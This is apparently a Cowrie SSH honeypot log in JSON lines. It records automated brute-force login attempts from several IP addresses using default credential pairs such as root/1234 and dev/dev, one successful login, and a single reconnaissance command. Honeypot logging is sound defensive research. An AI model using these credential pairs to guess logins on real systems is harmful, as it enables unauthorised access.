{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:13:26.559355Z","src_ip":"194.233.79.134","session":"71df43747c17"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:13:26.560020Z","src_ip":"194.233.79.134","session":"71df43747c17"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev","message":"login attempt [dev/dev] failed","sensor":"my-vps","timestamp":"2025-08-28T03:13:29.185007Z","src_ip":"194.233.79.134","session":"71df43747c17"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:13:30.769020Z","src_ip":"194.233.79.134","session":"71df43747c17"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":10036,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fbe408ae1b0","protocol":"ssh","message":"New connection: 45.125.211.194:10036 (1.2.3.4:22) [session: 8fbe408ae1b0]","sensor":"my-vps","timestamp":"2025-08-28T03:13:34.567855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:13:34.569011Z","src_ip":"45.125.211.194","session":"8fbe408ae1b0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:13:34.781540Z","src_ip":"45.125.211.194","session":"8fbe408ae1b0"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:13:35.665126Z","src_ip":"45.125.211.194","session":"8fbe408ae1b0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:13:36.877449Z","src_ip":"45.125.211.194","session":"8fbe408ae1b0"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":41912,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c2ae6fe5b77","protocol":"ssh","message":"New connection: 45.125.211.194:41912 (1.2.3.4:22) [session: 3c2ae6fe5b77]","sensor":"my-vps","timestamp":"2025-08-28T03:13:49.339257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:13:49.378958Z","src_ip":"45.125.211.194","session":"3c2ae6fe5b77"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:13:49.549767Z","src_ip":"45.125.211.194","session":"3c2ae6fe5b77"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:13:50.377906Z","src_ip":"45.125.211.194","session":"3c2ae6fe5b77"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:13:50.871052Z","src_ip":"45.125.211.194","session":"3c2ae6fe5b77"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:13:50.871712Z","src_ip":"45.125.211.194","session":"3c2ae6fe5b77"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:13:51.099495Z","src_ip":"45.125.211.194","session":"3c2ae6fe5b77"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:13:51.100661Z","src_ip":"45.125.211.194","session":"3c2ae6fe5b77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33028,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dd4302cd2a0","protocol":"ssh","message":"New connection: 212.227.235.229:33028 (1.2.3.4:22) [session: 0dd4302cd2a0]","sensor":"my-vps","timestamp":"2025-08-28T03:13:51.896465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:13:51.897292Z","src_ip":"212.227.235.229","session":"0dd4302cd2a0"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T03:13:52.000597Z","src_ip":"212.227.235.229","session":"0dd4302cd2a0"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos","message":"login attempt [centos/centos] failed","sensor":"my-vps","timestamp":"2025-08-28T03:13:52.416106Z","src_ip":"212.227.235.229","session":"0dd4302cd2a0"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:13:53.522717Z","src_ip":"212.227.235.229","session":"0dd4302cd2a0"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":16472,"dst_ip":"1.2.3.4","dst_port":22,"session":"548f31fe9efe","protocol":"ssh","message":"New connection: 45.125.211.194:16472 (1.2.3.4:22) [session: 548f31fe9efe]","sensor":"my-vps","timestamp":"2025-08-28T03:14:04.135247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:14:04.156817Z","src_ip":"45.125.211.194","session":"548f31fe9efe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:14:04.344868Z","src_ip":"45.125.211.194","session":"548f31fe9efe"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"123456","message":"login attempt [sonar/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:14:05.180391Z","src_ip":"45.125.211.194","session":"548f31fe9efe"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:14:06.392175Z","src_ip":"45.125.211.194","session":"548f31fe9efe"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51224,"dst_ip":"1.2.3.4","dst_port":22,"session":"05b674975b0e","protocol":"ssh","message":"New connection: 217.72.205.35:51224 (1.2.3.4:22) [session: 05b674975b0e]","sensor":"my-vps","timestamp":"2025-08-28T03:14:07.459038Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:14:07.460232Z","src_ip":"217.72.205.35","session":"05b674975b0e"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":19245,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3937fe00fea","protocol":"ssh","message":"New connection: 45.125.211.194:19245 (1.2.3.4:22) [session: d3937fe00fea]","sensor":"my-vps","timestamp":"2025-08-28T03:14:18.970100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:14:18.978111Z","src_ip":"45.125.211.194","session":"d3937fe00fea"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:14:19.189001Z","src_ip":"45.125.211.194","session":"d3937fe00fea"}
{"eventid":"cowrie.login.failed","username":"jumpserver","password":"jumpserver","message":"login attempt [jumpserver/jumpserver] failed","sensor":"my-vps","timestamp":"2025-08-28T03:14:20.022296Z","src_ip":"45.125.211.194","session":"d3937fe00fea"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:14:21.232637Z","src_ip":"45.125.211.194","session":"d3937fe00fea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46097,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4332e8fe8ab","protocol":"ssh","message":"New connection: 212.227.235.229:46097 (1.2.3.4:22) [session: c4332e8fe8ab]","sensor":"my-vps","timestamp":"2025-08-28T03:14:22.059041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:14:22.060698Z","src_ip":"212.227.235.229","session":"c4332e8fe8ab"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:14:22.166605Z","src_ip":"212.227.235.229","session":"c4332e8fe8ab"}
{"eventid":"cowrie.login.failed","username":"teest","password":"teest","message":"login attempt [teest/teest] failed","sensor":"my-vps","timestamp":"2025-08-28T03:14:22.768386Z","src_ip":"212.227.235.229","session":"c4332e8fe8ab"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:14:23.864281Z","src_ip":"212.227.235.229","session":"c4332e8fe8ab"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:14:30.999447Z","src_ip":"212.227.235.229","session":"229229099e73"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":59970,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c4aa47b1a2f","protocol":"ssh","message":"New connection: 45.125.211.194:59970 (1.2.3.4:22) [session: 0c4aa47b1a2f]","sensor":"my-vps","timestamp":"2025-08-28T03:14:33.849194Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:14:33.882242Z","src_ip":"45.125.211.194","session":"0c4aa47b1a2f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:14:34.121510Z","src_ip":"45.125.211.194","session":"0c4aa47b1a2f"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom123","message":"login attempt [tom/tom123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:14:34.960917Z","src_ip":"45.125.211.194","session":"0c4aa47b1a2f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:14:36.183625Z","src_ip":"45.125.211.194","session":"0c4aa47b1a2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52514,"dst_ip":"1.2.3.4","dst_port":23,"session":"e34d874840ec","protocol":"telnet","message":"New connection: 212.227.235.229:52514 (1.2.3.4:23) [session: e34d874840ec]","sensor":"my-vps","timestamp":"2025-08-28T03:14:47.784942Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":14963,"dst_ip":"1.2.3.4","dst_port":22,"session":"874e761c49c0","protocol":"ssh","message":"New connection: 45.125.211.194:14963 (1.2.3.4:22) [session: 874e761c49c0]","sensor":"my-vps","timestamp":"2025-08-28T03:14:48.734056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:14:48.757392Z","src_ip":"45.125.211.194","session":"874e761c49c0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:14:48.960473Z","src_ip":"45.125.211.194","session":"874e761c49c0"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:14:49.837553Z","src_ip":"45.125.211.194","session":"874e761c49c0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:14:51.060742Z","src_ip":"45.125.211.194","session":"874e761c49c0"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":54010,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bba462b02fb","protocol":"ssh","message":"New connection: 194.233.79.134:54010 (1.2.3.4:22) [session: 8bba462b02fb]","sensor":"my-vps","timestamp":"2025-08-28T03:14:53.075772Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:14:53.118311Z","src_ip":"194.233.79.134","session":"8bba462b02fb"}
